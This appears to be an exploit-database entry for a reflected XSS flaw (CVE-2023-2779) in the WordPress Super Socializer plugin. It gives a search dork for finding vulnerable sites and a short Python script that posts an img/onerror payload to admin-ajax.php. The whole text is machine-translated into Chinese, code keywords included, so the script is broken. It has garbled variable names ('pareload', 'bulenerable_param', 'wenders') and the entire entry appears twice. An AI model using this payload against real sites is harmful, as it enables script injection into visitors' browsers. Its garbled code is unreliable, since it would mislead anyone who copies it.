#利用title:超级社交器7.13.52-反映XSS
#dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_counturls [%3cimg%20src%20src%3dx;
#日期: 2023-06-20
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#供应商homepage: https://wordpress.org/plugins/super-socializer
#版本: 7.13.52(必需)
#在: Windows/Linux上测试
#CVE : CVE-2023-2779
导入请求
#脆弱的Ajax端点的URL
url='https://Example.com/wp-admin/admin-ajax.php'
#未正确消毒和逃脱的脆弱参数
vulnerable_param='img src=x oneerror=alert(document.domain)'
#利用漏洞的有效载荷
pareload={'action':'the_champ_sharing_count','urls [' + bulenerable_param +']':'3https://www.google.com'}
#带有有效载荷的端口请求
响应=requests.post(url,data=有效载荷)
#检查有效载荷是否是通过搜索注入的脚本标签执行的
如果'img src=x OneError=alert(document.domain)'in wenders.text:
打印(“成功利用脆弱性”)
其他:
打印(“脆弱性不探索”)
#dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_counturls [%3cimg%20src%20src%3dx;
#日期: 2023-06-20
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#供应商homepage: https://wordpress.org/plugins/super-socializer
#版本: 7.13.52(必需)
#在: Windows/Linux上测试
#CVE : CVE-2023-2779
导入请求
#脆弱的Ajax端点的URL
url='https://Example.com/wp-admin/admin-ajax.php'
#未正确消毒和逃脱的脆弱参数
vulnerable_param='img src=x oneerror=alert(document.domain)'
#利用漏洞的有效载荷
pareload={'action':'the_champ_sharing_count','urls [' + bulenerable_param +']':'3https://www.google.com'}
#带有有效载荷的端口请求
响应=requests.post(url,data=有效载荷)
#检查有效载荷是否是通过搜索注入的脚本标签执行的
如果'img src=x OneError=alert(document.domain)'in wenders.text:
打印(“成功利用脆弱性”)
其他:
打印(“脆弱性不探索”)